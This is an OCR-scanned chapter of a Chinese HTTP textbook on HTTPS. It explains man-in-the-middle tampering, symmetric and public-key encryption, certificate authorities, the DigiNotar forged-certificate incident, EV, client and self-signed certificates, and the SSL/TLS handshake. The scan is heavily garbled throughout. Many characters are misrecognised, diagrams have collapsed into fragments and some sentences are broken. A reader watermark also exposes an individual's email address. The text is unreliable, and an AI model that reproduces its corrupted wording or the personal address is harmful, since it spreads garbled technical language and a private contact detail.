e 无 法 确定 正在 通信 的 对 方 是 否 具备 访问 权限 。 因 为 某 些 Web 服 
务 器 上 保存 着 重要 的 信息 ， 只 想 发 给 特定 用 户 通 信 的 权限 。 


图 灵 社 区 会 员 Dylan.Y(yuanlongyoung@gmail.com) 专 享 尊重 版 权 


第 7 章 确保 Web 安 全 的 HTTPS 


e@ 无 法 判定 请 求 是 来 自 何 方 、 出 自 谁 手 。 
e@ 即使 是 无 意义 的 请 求 也 会 照 单 全 收 。 无 法 阻止 海量 请 求 下 的 DoS 
攻击 ( Denial of Service， 拒 绝 服务 攻击 )。 


国 查 明 对 手 的 证 书 

虽然 使 用 HITP 协议 无 法 确定 通信 方 ， 但 如 果 使 用 SSL 则 可 以 。 
SSL 不 仅 提供 加 密 处 理 ， 而 且 还 使 用 了 一 种 被 称 为 证 书 的 手段 ， 可 用 于 
确定 方 。 

证 书 由 值得 信任 的 第 三 方 机 构 颁 发 ， 用 以 证 明 服 务 器 和 客户 端 是 实 
际 存 在 的 。 男 外 ,伪造 证 书 从 技术 角度 来 说 是 异常 困难 的 一 件 事 。 所 以 
只 要 能 够 确认 通信 方 ( 服务 器 或 客户 端 ) 持 有 的 证 书 ， 即 可 判断 通信 方 
的 真实 意图 。 

















EE 


、 ~ ~ SR 语 
{ 客户 端 在 开始 通信 之 前 先 确认 “1 | 或 已 绚 闪 ， 这 全 服务 器 
| ”服务 器 的 证 书 的 确 是 A 公司 的 Web 网 
Sh | | 站 服务 器 





值得 信赖 的 
第 三 方 









咽 ， 看 来 我 准备 访问 曲 
就 是 A 公司 曲 Web 风 站 
的 服务 器 


得 信赖 的 第 三 方 是 指 
Web 网 站 服务 器 全 得 人 束 F ss 
Sb 网 加 服务 缆 | 普遍 已 获得 社会 认可 的 


企业 或 组 织 机 构 。 








通过 使 用 证 书 ， 以 证 明 通信 方 就 是 意料 中 的 服务 各 。 这 对 使 用 者 个 
人 来 计 ， 也 减少 了 个 人 信息 泄露 的 危险 性 。 

为 外 ， 客 户 闪 持 有 证 书 即 可 完成 个 人 里 份 的 确认 ， 也 可 用 于 对 Web 
网 站 的 认证 环 太 。 
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7.1.3 ”无 法 证 明报 文 完 整 性 ， 可 能 已 遭 自 改 
所 谓 完整 性 是 指 信息 的 准确 度 。 若 无 法 证 明 其 完整 性 ， 通 常 也 就 意 
味 着 无 法 判断 信息 是 否 准 确 。 





CE 


图 接收 到 的 内 容 可 能 有 误 

由 于 HITP 协议 无 法 证 明 通 信 的 报 文 完整 性 ， 因 此 ， 在 请 求 或 啊 应 
送出 之 后 下 到 对 方 接收 之 前 的 这 段 时 间 内 ， 即 使 请 求 或 啊 应 的 内 容 唱 到 
算 改 ， 也 没有 办 法 获悉 。 

换 句 话说 ， 没 有 任何 办 法 确认 ， 发 出 的 请 求 / 啊 应 和 接收 到 的 请 
求 / 啊 应 是 前 后 相同 的 。 














中 途 可 能 被 自 改 


@” > 
- 
刻 饭 说 无 法 判断 A 和 B 是 相同 的 


比如 ， 从 某 个 Web 网 站 上 下 载 内 容 ， 是 无 法 确定 客户 端 下载 的 文 
件 和 服务 器 上 存放 的 文件 是 否 前 后 一 致 的 。 文 件 内 容 在 传输 途中 可 能 已 
经 被 算 改 为 其 他 的 内 容 。 即 使 内 容 真 的 已 改变 ， 作 为 接收 方 的 客户 端 也 
是 觉察 不 到 的 。 

像 这 样 ， 请 求 或 啊 应 在 传输 途中 ， 遭 攻击 者 拦截 并 算 改 内 容 的 攻击 
称 为 中 间 人 攻击 ( Man-in-the-Middle attack，MITM )。 








服务 颖 
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攻击 者 杀 入 ， 从 中 禄 取 请 来 和 响应 


呵呵 呵 








客户 站 攻击 者 


攻击 人 会 随意 自 改 请 求 和 响应 ， 而 让 客户 端 与 服务 器 之 间 的 
通信 看 上 去 仍 旧 是 正常 号 的 。 








图 : 中 间 人 攻击 
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国 如 何 防 止 算 改 

虽然 有 使 用 HTTP 协议 确定 报 文 完整 性 的 方法 ,但 事实 上 并 不 便 
捷 、 可 靠 。 其 中 常用 的 是 MD5 和 SHA-1 等 散 列 值 校 验 的 方法 ， 以 及 用 
来 确认 文件 的 数字 签名 方法 。 





Apache HTTP Server 2.4.2 (httpd): 2.4.2 is the latest available version 


The Apache HTTP Server Project is pleased to announce the release of version 2.4.2 of the Apache HTTP 
server ("Apache" and "httpd"). This version of Apache is our 2nd GA release of the new generation 2.4.x 
branch of Apache HTTPD and represents fifteen years of innovation by the project, and is recommended 
Over all previous releases! 
For details see the Official Announcement and the CHANGES 2.4 and CHANGES 2.42 lists 

es。 Unix Source: httpd-2.4.2.tarbz2 [ PGP ] [ MDS ] [ SHA1 ] 


。 Unix Source: httpd-2.4.2.targz [ PGP ] [ MDS ] [ SHA1 ] 





。 Security and official patches 


Other fl Download - The Apache HTTP Server Project 
”ss http:i/httpd.apache.org/download.cgi 





提供 文件 下 载 服务 的 Web 网 站 也 会 提供 相应 的 以 PGP ( Pretty Good 
Privacy， 完 美 隐私 ) 创建 的 数字 签名 及 MD5 on PGP 
是 用 来 证 明 创 建文 件 的 数字 签名 ，MD5 是 由 单 回国 数 生成 的 散 列 值 。 
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EL 


不 论 使 用 哪 一 种 方法 ， 都 需要 操纵 客户 端的 用 户 本 人 亲自 检查 验证 下 载 
的 文件 是 否 就 是 原来 服务 器 上 的 文件 。 浏 览 需 无 法 自动 帮 用 户 检查 。 

可 惜 的 是 ， 用 这 些 方法 也 依然 无 法 百 分 百 保证 确认 结果 正确 。 因 为 
PGP 和 MD5 本 喘 被 改写 的 话 ， 用 户 是 没有 办 法 意识 到 的 。 

为 了 有 效 防 止 这 些 深 问 ， 有 必要 使 用 HTTPS。SSL 提供 认证 和 加 
密 处 理 及 摘要 功能 。 仅 靠 HTTP 确保 完整 性 是 非常 困难 的 ， 因 此 通过 和 
其 他 协议 组 合 使 用 来 实现 这 个 目标 。 下 市 我 们 介绍 HTTPS 的 相关 内 容 。 

















7.2 HTTP+ 加 密 + 认证 + 完整 性 保护 =HTTPS 


7.2.1 HTTP 加 上 加 密 处 理 和 认证 以 及 完整 性 保护 后 即 是 HTTPS 
如 果 在 HTTP 协议 通信 过 程 中 使 用 未 经 加 密 的 明文 ， 比 如 在 Web 页 面 
中 输入 信用 卡号 ， 如 果 这 条 通信 线路 遭 到 窃听 ， 那 么 信用 卡号 就 暴露 了 。 
另外 ， 对 于 HTTP 来 说 ， 服 务 融 也 好 ， 客 户 端 也 好 ， 都 是 没有 办 法 
确认 通信 方 的 。 因 为 很 有 可 能 并 不 是 和 原本 预想 的 通信 方 在 实际 通信 。 
并 且 还 需要 考虑 到 接收 到 的 报 文 在 通信 途中 已 经 遭 到 算 改 这 一 可 能 性 。 

















为 了 统一 解决 上 述 这 些 问 题 ， 需 要 在 HITP 上 再 加 入 加 密 处 理 和 认证 等 
机 制 。 我 们 把 添加 了 加 密 及 认证 机 制 的 HITP 称 为 HITPS( HTTP Secure )。 


人 
HTTP+ 通信 加 密 + 证 书 + 完 整 性 保护 一 


证 书 






































:可 证 书 可 证 明 服务 器 或 安 户 端的 身份 
证 书 


图 : 使 用 HTTPS 通信 
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常会 在 Web 的 登录 页 面 和 购物 结算 界面 等 使 用 HTTPS 通信 。 使 
用 HTTPS 通信 时 ， 不 再 用 http://， 而 是 改 用 https:/。 另 外 ， 当 浏览 器 
访问 HTTPS 通信 有 效 的 Web 网 站 时 ， 浏 览 融 的 地 址 栏 内 会 出 现 一 个 市 
锁 的 标记 。 对 HTTPS 的 显示 方式 会 因 浏 览 右 的 不 同 而 有 所 改变 







鲁 https://twitter.com 










别 | 回 Bass verson cas3 
Extended Validation SSL CA 验证 。 
证 书信 息 





与 twitter.com 的 连接 采用 128 位 加 密 
国 议 


该 连接 使 用 TLS 1.0。 


该 连接 是 使 用 RC4_128 进行 加 密 的 ， 
同时 使 用 SHA1 进行 讯息 身份 验证 并 
a ECDHE_RSA 作为 密 钥 交换 机 















该 连接 未 进行 压缩 处 理 。 





您 以 前 从 未 访问 过 此 网 站 。 
- Twitter. 
小, @xplore your 
interests, and be in the know. 














7.2.2 HTTPS 是 身 披 SSL 外 帝 的 HTTP 

HTTPS 并 非 是 应 用 层 的 一 种 新 协议 。 只 是 HTTP 通信 接口 部 分 用 
SSL ( Secure Socket Layer ) 和 TLS (Transport Layer Security ) 协议 代替 
mE 

通常 ，HTTP 直接 和 TCP 通信 。 当 使 用 SSL 时 ， 则 演变 成 先 和 
SSL 通信 ， 再 由 SSL 和 TCP 通信 了 。 人 简 言 之 ,所谓 HITPS， 其 实 就 是 
号 披 SSL 协议 这 层 外 过 的 HTTP。 
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在 采用 SSL 后 ，HTTP 就 拥有 了 HTTPS 的 加 密 、 证 书 和 完整 性 保 
护 这 些 功能 。 

SSL 是 独立 于 HTTP 的 协议 ， 所 以 不 光 是 HTTP 协议 ， 其 他 运行 在 
应 用 层 的 SMTP 和 Telnet 等 协议 均 可 配合 SSL 协议 使 用 。 可 以 说 SSL 





是 当今 世界 上 应 用 最 为 广泛 的 网 络 安全 技术 。 


7.2.3 ”相互 交换 密 钥 的 公开 密 钥 加 密 技术 

在 对 SSL 进行 讲解 之 前 ， 我 们 先 来 了 解 一 下 加 密 方 法 。SSL 采用 一 
种 叫做 公开 密 钥 加 密 ( Public-key cryptography ) 的 加 密 处 理 方式 。 

近代 的 加 密 方 法 中 加 密 算 法 是 公开 的 ， 而 密 钥 却 是 保密 的 。 通 过 这 
种 方式 得 以 保持 加 密 方法 的 安全 性 。 

加 密 和 解密 都 会 用 到 密 铀 。 没 有 密 钥 吉 无 法 对 密码 解密 ， 反 过 来 
说 ， 任 何人 只 要 持 有 密 钥 就 能 解密 了 。 如 末 密 钥 被 攻击 者 获得 ， 那 加 密 
也 就 失去 了 意义 。 








国共 享 密 钥 加 密 的 困境 
加 密 和 人 解密 同 用 一 个 密 钥 的 方式 称 为 共享 密 钥 加 密 ( Common key 
crypto system )， 也 被 叫做 对 称 密 钥 加 密 。 
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外 


加 密 解 密使 用 
相同 的 密 钥 





~ 


呵呵 呵 


_! 只 要 拿 到 密 钥 ，| 
< 二， 任何 人 都 能 破解 ， 

! 密码 
攻击 者 ~-------- 





js53 





以 共享 密 钥 方式 加 密 时 必须 将 密 钥 也 发 给 对 方 。 可 究竟 怎样 才能 安 
全 地 转交 ? 在 互联 网 上 转发 密 钥 时 ， 如 采 通 信和 被 监听 那么 密 钥 瓯 可 会 洛 
人 攻击 者 之 手 ， 同 时 也 就 失去 了 加 密 的 意义 。 另 外 还 得 设法 安全 地 保管 
接收 到 的 密 钥 。 





发 送 密 钥 就 有 被 留 听 的 风险 , 但 不 发 送 , 对 方 就 不 能 解密 。 再说， 密 
钥 若 能 够 安全 发 送 , 那 数据 也 应 该 能 安全 送 达 。 








图 : 密 钥 发 送 问题 
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国 使 用 两 把 密 钥 的 公开 密 钥 加 密 

公开 密 钥 加 密 方 式 很 好 地 解决 了 共享 密 钥 加 密 的 困难 。 

公开 密 钥 加 密使 用 一 对 非 对 称 的 密 钥 。 一 把 叫做 私有 密 钥 〈Pprivate 
key )， 另 一 把 叫做 公开 密 钥 ( public key )。 顾 名 思 义 ， 私 有 密 钥 不 能 让 
其 他 任何 人 知道 ， 而 公开 密 钥 则 可 以 随意 发 布 ， 任 何人 都 可 以 获得 。 

使 用 公开 密 钥 加 蜜 方式 ， 发 送 密 文 的 一 方 使 用 对 方 的 公开 密 钥 进行 
加 密 处 理 ， 对 方 收 到 被 加 密 的 信息 后 ， 再 使 用 自己 的 私有 密 钥 进行 解 
密 。 利 用 这 种 方式 ， 不 需要 发 送 用 来 解密 的 私有 密 钥 ， 也 不 必 担 心 密 针 
被 攻击 者 筋 听 而 盗 走 。 

为 外 ， 要 想 根 据 密 文 和 公开 密 钥 ,恢复 到 信息 原文 是 异常 困难 的 ， 
因为 解密 过 程 就 是 在 对 离散 对 数 进行 求 信 ， 这 并 非 轻 而 多 举 就 能 办 到 。 
退 一 步 讲 ， 如 果 能 对 一 个 非常 大 的 整数 做 到 快速 地 因 式 分 解 ， 那 么 密码 
破解 还 是 存在 希望 的 。 但 就 目前 的 技术 来 看 是 不 太 现 实 的 。 





























ee 









公开 密 钥 可 
转交 给 任何 人 公开 密 钥 
私有 密 钥 
公开 密 钥 和 私有 密 钥 


是 配对 的 一 套 密 钥 


使 用 公开 密 钥 


进行 加 密 





使 用 私有 密 钥 


进行 解密 
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国 HTTPS 采 用 混合 加 密 机 制 

HTTPS 采用 共享 密 钥 加 密 和 公开 密 钥 加 密 两 者 并 用 的 混合 加 蜜 机 
制 。 帮 密 钥 能 够 实现 安全 交换 ， 那 么 有 可 能 会 考虑 仅 使 用 公开 密 钥 加 密 
来 通信 。 但 是 公开 密 钥 加 密 与 共享 密 钥 加 密 相 比 ， 其 处 理 速 度 要 慢 。 

所 以 应 充分 利用 两 者 各 目的 优势 ， 将 多 种 方法 组 合 起 来 用 于 通信 。 
在 交换 密 钥 环节 使 用 公开 密 钥 加 密 方式 ， 之 后 的 建立 通信 交换 报 文 阶段 
则 使 用 共享 密 钥 加 密 方式 。 





公开 密 钥 加 密 处 理 起 来 比 共享 密 钥 加 密 方式 更 为 复杂 ， 因 此 若 在 通 


信 时 使 用 公开 密 钥 加 密 方 式 ,， 效率 就 很 低 








中 使 用 公开 密 钥 加 密 方 式 安全 地 交换 在 稍 后 的 共享 密 钥 加 密 中 要 使 用 的 密 钥 
C 
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@ 确 保 交换 的 密 钥 是 安全 的 前 提 下 ， 使 用 共享 密 


: 混合 加 密 机 制 


7.2.4 ”证 明 公 开 密 钥 正确 性 的 证 书 
遗憾 的 是 ， 公 开 密 钥 加 密 方式 还 是 存在 一 些 问题 的 。 那 就 是 无 法 证 
明 公开 密 钥 本 身 就 是 货真价实 的 公开 密 钥 。 比 如 ， 正 准备 和 某 台 服务 器 
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加 加 加 国 
nn 
建立 公开 密 钥 加 密 方 式 下 的 通信 时 ， 如 何 证 明 收 到 的 公开 密 钥 就 是 原本 
预想 的 那 台 服务 硕 发 行 的 公开 密 钥 。 或 许 在 公开 密 钥 传输 途中 ， 真 正 的 
公开 密 钥 已 经 被 攻击 者 蔡 换 挥 了 。 

为 了 解决 上 述 问 题 ， 可 以 使 用 由 数字 证 书 认 证 机 构 ( CA，Certificate 
Authority ) 和 其 相关 机 关 颁 发 的 公开 密 钥 证 书 。 

数字 证 书 认证 机 构 处 于 客户 并 与 服务 磊 双 方 都 可 信赖 的 第 三 方 机 构 
的 立场 上 。 威 瑞 信 ( VeriSign ) 就 是 其 中 一 家 非常 有 名 的 数字 证 书 认证 
机 构 。 我 们 来 介绍 一 下 数字 证 书 认 证 机 构 的 业务 流程 。 首 先 ， 服 务 硕 的 
运营 人 员 回 数字 证 书 认 证 机 构 提 出 公开 密 钥 的 申请 。 数 字 证 书 认 证 机 构 
在 判明 提出 申请 者 的 号 份 之 后 ， 会 对 已 申请 的 公开 密 钥 做 数字 签名 ， 然 
后 分 配 这 个 已 签名 的 公开 密 钥 ， 并 将 该 公开 密 钥 放 人 公 钥 证 书后 绑 定 在 
一 起 。 

服务 硕 会 将 这 份 由 数字 证 书 认 证 机 构 颁 发 的 公 钥 证 书 发 送 给 客户 
端 ， 以 进行 公开 密 钥 加 蜜 方式 通信 。 公 钥 证 书 也 可 叫做 数字 证 书 或 直接 
称 为 证 书 。 

接 到 证 书 的 客户 端 可 使 用 数字 证 书 认 证 机 构 的 公开 密 钥 ， 对 那 张 证 
书 上 的 数字 签名 进行 验证 ， 一 旦 验证 通过 ， 客 户 端 便 可 明确 两 件 事 : 
一 ， 认 证 服务 需 的 公开 密 钥 的 是 真实 有 效 的 数字 证 书 认 证 机 构 。 二 ， 服 
务 融 的 公开 密 钥 是 住 得 信赖 的 。 

此 处 认证 机 关 的 公开 密 钥 必须 安全 地 转交 给 客户 端 。 使 用 通信 方式 
时 ， 如 何 安全 转交 是 一 件 很 困难 的 事 ， 因 此 ， 多 数 浏 览 硕 开发 商 发 布 版 
本 时 ,会 事先 在 内 部 植 和 人 常用 认证 机 关 的 公开 密 钥 。 
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数字 证 书 认 证 机 构 
的 公开 密 钥 已 事先 数字 证 书 认 证 机 构 


植 入 到 浏览 颖 里 了 


(3) 客 户 端 拿 到 服务 器 的 公 
钥 证 书后 , 使 用 数字 证 
书 认 证 机 构 的 公开 密 
钥 ， 向 数字 证 书 认 证 机 
构 验证 公 钥 证 书 上 的 数 
字 签 名 , 以 确认 服务 器 
的 公开 密 钥 的 真实 性 





(4 使 用 服务 器 的 公开 密 钥 对 报 
文 加 密 后 发 送 


预期 目的 (N) : 


第 7 章 确保 Web 安 全 的 HTTPS 


数字 证 书 认证 机 构 的 私有 密 钥 





2) 数字 证 书 认 证 机 构 用 自己 的 私有 密 钥 向 服务 
器 的 公开 密码 署 数字 签名 并 颁发 公 钥 证 书 










中 服务 器 把 自己 的 公开 密 钥 
登录 至 数字 证 书 认 证 机 构 


服务 器 的 
公开 密 铀 








服务 器 的 
公开 密 铀 
十 
数字 证 书 认证 
机 构 的 数字 签名 


少 
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公司 记 
服务 器 的 

《一 私有 密 铀 

Eee 司 服务 器 用 私 


有 密 钥 对 报 。 137 
文 解密 














[全 人 其 他 人 | 中 级 证 书 颁发 机 构 | 受信 任 的 根 证 书 颁发 机 构 | 受信 任 的 发 布 者 | 











颁发 给 


GlThawte Timestampin,,， Thawte Timestampin,,， 星期 五 01-01 Thawte 1 
Sal ~ DATACorp SGC UTN ~ DATACorp SGC 星期 二 06-25 USERTrus 
GIUTN-USERFirst-0bject UTN-USERFirst-0bject 星期 三 07-10 ”< 无 > 
GIUTN-USERFirst-0bject UTN-USERFirst-0bject ”星期 三 07-10 USERTrus 
Ba VeriSign Class 3 P,,， VeriSign Class 3 P,,, 星期 四 07-17 Verisio 

国 j]VeriSign Class 3 P,,， VeriSign Class 3 P,,， 星期 四 07-17 < 无 > | 
国 jVeriSign Class 3 P,,， VeriSign Class 3 P,,， 星期 四 07-17 VeriSigr ~- 


颁发 者 截止 日 期 友好 名 舟 ^ 








4 


HN | ' 
































证 书 的 预期 目的 
代码 签名 ， 服 务 器 身份 验证 ， 客 户 端 身份 验证 ， 安 全 电子 邮件 


了 解 证 书 的 详细 信息 
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国 可 证 明 组 织 真实 性 的 EV SSL 证 书 

证 书 的 一 个 作用 是 用 来 证 明 作 为 通信 一 方 的 服务 右 是 否 规 范 ， 男 外 
一 个 作用 是 可 确认 对 方 服务 问 痛 后 运营 的 企业 是 否 真 实 存 在 。 拥 有 该 特 
性 的 证 书 就 是 EV SSL 证 书 ( Extended Validation SSL Certificate )。 

EV SSL 证 书 是 基于 国际 标准 的 认证 指导 方针 颁发 的 证 书 。 其 严格 
规定 了 对 运营 组 织 是 否 真 实 的 确认 方针 ， 因 此 ， 通 过 认证 的 Web 网 站 
能 够 获得 更 高 的 认可 度 。 

持 有 EV SSL 证 书 的 Web 网 站 的 浏览 右 地 址 住处 的 背景 色 是 绿色 
的 ， 从 视觉 上 就 能 一 眼 辨 别 出 。 而 且 在 地 址 栏 的 左 侧 显示 了 SSL 证 书 
中 记录 的 组 织 名 称 以 及 颁发 证 书 的 认证 机 构 的 名 称 。 


























上 述 机 制 的 原意 图 是 为 了 防止 用 户 被 钓鱼 攻击 〈Phishing )， 但 就 效 
果 上 来 讲 ， 还 得 打 一 个 问号 。 很 多 用 户 可 能 不 了 解 EV SSL 证 书 相关 的 
知识 ， 因 此 也 不 太 会 留意 它 。 





国 用 以 确认 客户 端的 客户 端 证 书 

HTTPS 中 还 可 以 使 用 客户 端 证 书 。 以 客户 端 证 书 进 行 客户 端 认证 ， 
证 明 服 务 需 正在 通信 的 对 方 始终 是 预料 之 内 的 客户 端 ， 其 作用 跟 服务 器 
证 书 如 出 一 入 。 

但 客户 端 证 书 仍 存 在 几 处 问题 点 。 其 中 的 一 个 问题 点 是 证 书 的 获取 
及 发 布 。 

想 获取 证 书 时 ， 用 户 得 自行 安装 客户 端 证 书 。 但 由 于 客户 端 证 书 是 
要 付费 购买 的 ， 且 每 张 证 书 对 应 到 每 位 用 户 也 就 意味 着 需 文 付 和 用 户 数 
对 等 的 费用 。 另 外 ， 要 让 知识 层次 不 同 的 用 户 们 自行 安装 证 书 ， 这 件 事 
本 身 也 充满 了 各 种 挑战 。 

现状 是 ， 安 全 性 极 高 的 认证 机 构 可 颁发 客户 端 证 书 但 仅 用 于 特殊 用 
途 的 业务 。 比 如 那些 可 文 撑 客 户 端 证 书 文 出 费用 的 业务 。 
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例如 ， 银 行 的 网 上 银行 束 采 用 了 客户 问 证 书 。 在 登录 网 银 时 不 仪 要 
求 用 户 确 认输 入 ID 和 密码 ， 还 会 要 求 用 户 的 客户 端 证 书 ， 以 确认 用 户 
是 否 从 特定 的 终端 访问 网 银 。 

客户 疹 证 书 存 在 的 忆 一 个 问题 点 是 ， 客 户 闪 证 书 毕 竟 只 能 用 来 证 明 
客户 端 实际 存在 ， 而 不 能 用 来 证 明 用 户 本 人 的 真实 有 效 性 。 也 就 是 说 ， 
只 要 获得 了 安 骤 有 客户 桨 证书 的 计算 机 的 使 用 权限 ， 也 就 意味 春 同时 拥 
有 了 客户 端 证 书 的 使 用 权限 。 

















国 认 证 机 构 信誉 第 一 

SSL 机 制 中 介入 认证 机 构 之 所 以 可 行 ， 是 因为 建立 在 其 信用 绝对 可 
徘 这 一 大 前 提 下 的 。 人 然而，2011 年 7 月 ， 何 兰 的 一 家 名 叫 DigiNotar 的 
认证 机 构 曾 遭 震 客 不 法 入 侵 ， 颁 布 『 google.com 和 twitter.com 等 网 站 
的 伪造 证 书 事件 。 这 一 事件 从 根本 上 撼动 了 SSL 的 可 信和 度 。 

为 伪造 证 书 上 有 正规 认证 机 构 的 数字 签名 ， 所 以 浏览 需 会 判定 该 
证 书 是 正当 的 。 当 伪造 的 证 书 被 用 做 服务 问 伪 装 之 时 ， 用 户 根 本 无 法 察 
觉 到 。 

虽然 存在 可 将 证 书 无 效 化 的 证 书 吊 销 列 表 〈 Certificate Revocation 
List，CRL ) 机 制 ， 以 及 从 客户 端 删 除根 证 书 颁发 机 构 ( Root Certificate 
Authority，RCA ) 的 对 策 ， 但 是 距离 生效 还 需要 一 段 时 间 ， 而 在 这 段 时 
间 内 ， 到 底 会 有 多 少 用 户 的 利益 蒙受 损失 就 不 得 而 知 了 。 
































国 由 自 认 证 机 构 颁 发 的 证 书 称 为 自 签名 证 书 

如 果 使 用 OpenSSL 这 套 开 源 程序 ， 每 个 人 都 可 以 构建 一 套 属 于 自 
己 的 认证 机 构 ， 从 而 目 己 给 目 己 颁发 服务 硕 证 书 。 但 该 服务 硕 证 书 在 互 
联网 上 不 可 作为 证 书 使 用 ， 似 乎 没什么 帮助 。 

独立 构建 的 认证 机 构 叫 做 自 认 证 机 构 ， 由 上 自 认证 机 构 颁 发 的 “无 
用 ”证 书 也 被 戏称 为 日 签名 证 书 。 

浏览 妖 访 问 该 服务 右 时 ， 会 显示 “无 法 确认 连接 安全 性 ”或 “该 网 


Ws9 
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站 的 安全 证 书 存在 问题 ”等 警告 消息 。 


安全 警报 


外 无 法 验证 此 网 站 的 标识 或 此 连接 的 先 整 性 . 


公司 癸 避 .可 以 查看 证 书 


广 实 全 正 书 的 日 期 有 郊 . 
和 


是 否 继 续 ? 


[是 M || MN || 查看 正和 M 
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由 目 认 证 机 构 颁 发 的 服务 带 证 书 之 所 以 不 起 作用 ， 是 因为 它 无 法 消 
除 伪 涨 的 可 能 性 。 目 认证 机 构 能 够 产生 的 作用 项 多 也 就 是 日 己 对 外 宣称 
“我 是 OO” 的 这 种 程度 。 即 使 采用 日 签名 证 书 ， 通 过 SSL 加 密 之 后 ， 
可 能 偶尔 还 会 看 见 通信 处 在 安全 状态 的 提示 ， 可 那 也 是 有 问题 的 。 因 为 
就 拭 加 密 通 信 ， 也 不 能 排除 正在 和 已 经 过 伪 疙 的 假 服 务 冀 保持 通信 。 

值得 信赖 的 第 三 方 机 构 介 入 认证 ， 才 能 让 已 植 人 在 训 览 融 内 的 认证 
机 构 颁布 的 公开 密 钥 发 挥 作用 ， 并 信 此 证 明 服 务 珊 的 真实 性 。 
































中 级 认证 机 构 的 证 书 可 能 会 变 成 自 认 证 证 书 

多 数 浏览 器 内 预先 已 植 和 备 受 信赖 的 认证 机 构 的 证 书 ， 但 也 有 一 小 
部 分 浏览 器 会 植 和 中 级 认证 机 构 的 证 书 。 

对 于 中 级 认证 机 构 颁发 的 服务 器 证 书 ， 某 些 浏览 器 会 以 正规 的 证 书 
来 对 待 ， 可 有 的 浏览 器 会 当 作 自 签名 证 书 。 
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7.2.5 安 
的 安全 通信 机 制 
了 地 理解 HTTPS， 我 人 
， 我 们 来 观察 一 下 H 
LR TTPS 的 通信 步骤 





Han 
dshake: ClientHello 





服务 器 





Handshake: ServerHello 
Handshake: Certificate 人 
Handshake. ServerHelloDone 氏 
Handshake: cy 
全 Clientke 
YExchan 
0 ChangeCi 一 
pherSpec 
dle Ei 


changeCipherSpec (@ 
Handshake: Finished @ 


pa es 
pplication Dataf HTT 
本 


®@ 


Application Datal HTTP 


Alert: 
. W 。 
aming, close notif 
y 


: HTTPS 通信 
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步骤 1: ”客户 端 通过 发 送 Client Hello 报 文 开始 SSL 通信 。 报 文中 
包含 客户 端 文 持 的 SSL 的 指定 版 本 、 加 密 组 件 (Cipher 
Suite ) 列表 (所 使 用 的 加 密 算法 及 密 钥 长 度 等 )。 

步骤 2: ”服务 磊 可 进行 SSL 通信 时 ， 会 以 Server Hello 报 文 作为 应 
答 。 和 客户 端 一 样 ， 在 报 文中 包含 SSL 版 本 以 及 加 密 组 
件 。 服 务 顺 的 加 密 组 件 内 容 是 从 接收 到 的 客户 端 加 密 组 件 








内 算 选 出 来 的 。 
步骤 3: ”之 后 服务 器 发 送 Certificate 报 文 。 报 文中 包含 公开 密 铀 
证 





步骤 4: ”最 后 服务 病 发 送 Server Hello Done 报 文通 知客 户 问 ， 最 初 
阶段 的 SSL 握手 协商 部 分 结 

步骤 5: SSL 第 一 次 握手 结束 之 后 ， 客 户 问 以 Client Key Exchange 
报 文 作为 回应 。 报 文中 包含 通信 加 蜜 中 使 用 的 一 种 被 称 为 
Pre-master secret 的 随机 密码 串 。 该 报 文 已 用 步 叱 3 中 的 公 
开 密 钥 进 行 加 蜜 。 

步骤 6: 接着 客户 端 继续 发 送 Change Cipher Spec 报 文 。 该 报 文 会 
提示 服务 着 ， 在 此 报 文 之 后 的 通信 会 采用 Pre-master secret 
密 钥 加 密 。 

步骤 7: ”客户 问 发 送 Finished 报 文 。 该 报 文 包含 连接 至 今 全 部 报 文 

的 整体 校 验 值 。 这 次 握手 协商 是 否 能 够 成 功 ， 要 以 服务 需 

是 否 能 够 正确 解密 该 报 文 作为 判定 标准 。 

又 8: 服务 侣 同样 发 送 Change Cipher Spec 报 文 。 

9: ”服务 天 同样 发 送 Finished 报 文 。 

又 10: 服务 名 和 客户 端的 Finished 报 文 交 换 完 毕 之 后 ，SSL 连接 

就 算 建 立 完 成 。 当 然 , 通信 会 受到 SSL 的 保护 。 从 此 处 开 
台 进 行 应 用 层 协 议 的 通信 ， 即 发 送 HTTP 请求。 
步 又 11: 应 用 层 协议 通信 ， 即 发 送 HTTP 啊 应 。 
步骤 12: 最 后 由 客户 端 断 开 连 接 。 汤 开 连 接 时 ， 发 送 close_notify 
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报 文 。 上 图 做 了 一 些 省 略 ， 这 步 之 后 再 发 送 TCP FIN 报 文 来 关闭 与 TCP 
通信 。 


在 以 上 流程 中 ， 应 用 层 发 送 数据 时 会 附加 一 种 叫做 MAC ( Message 
Authentication Code ) 的 报 文摘 要 。MAC 能 够 查 知 报 文 是 否 遭 到 算 改 ， 
从 而 保护 报 文 的 完整 性 。 

下 面 是 对 整个 流程 的 图 解 。 图 中 说 明了 从 仅 使 用 服务 器 端的 公开 密 
钥 证 书 ( 服务 器 证 书 ) 建立 HTTPS 通信 的 整个 过 程 。 




























私有 密 名 et 共享 密 钥 加 密 的 密 铀 
DiS MasehSeele 报 文 校 验 码 的 密 钥 
ee 
上 由 use sooret 。 生成 CBC 模 式 ' 的 初始 向 量 
宇 |> 航 
WD > > 
服务 器 | um 0 -一 一 日 Wh 


( 服务 器 证 书 ) 


i 










发 送 公 大 








。 共享 密 钥 加 密 的 密 钥 

。 报 文 校 验 码 的 密 钥 

。 生成 CBC 的 初始 向 量 ， 
服务 器 一 用 于 客户 端 ， 






协商 决定 
加 密 组 件 







发 送 已 加 密 的 以 及 客户 端 一 用 于 服务 
pre-master secret 器 的 6 份 信息 


冬 纪 ER 
人 共享 密 钥 加 密 的 密 包 
0101 人 pre-master 
此 0 生成 CBC 模 式 的 初始 向 量 


/= pe 

mm @ 

| ] pre-master 
Eg secret 


客户 端 公开 密 钥 (随机 数 ) 






























a 1 00100 | 人 = A 
一 





国 SSL 和 TLS 
HTTPS 使 用 SSL (Secure Socket Layer ) 和 TLS ( Transport Layer 
Security ) 这 两 个 协议 。 


(D Cn 模式 (Cipher Block Chaining ) 又 名 密码 分 组 链接 模式 。 在 此 模式 下 , 将 
一 个 明文 块 加密 处 理 后 和 下 一 个 明文 块 做 XOR 运算 , 使 之 重合 ,然后 再 对 

a 吉 果 做 加 密 处 理 。 对 第 一 个 明文 块 做 加 密 时 ， 要么 使 用 前 一 段 密 文 的 最 
后 一 块 ， 要 么 利用 外 部 生成 的 初始 向 量 (initial vector, IV )。 译 者 注 
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SSL 技术 最 初 是 由 浏览 硕 开 发 商 网 景 通信 公司 率先 倡导 的 ， 开 发 过 
SSL3.0 之 前 的 版 本 。 目 前 主导 权 已 转移 到 IETF ( Internet Engineering 
Task Force，Internet 工程 任务 组 ) 的 手中 。 

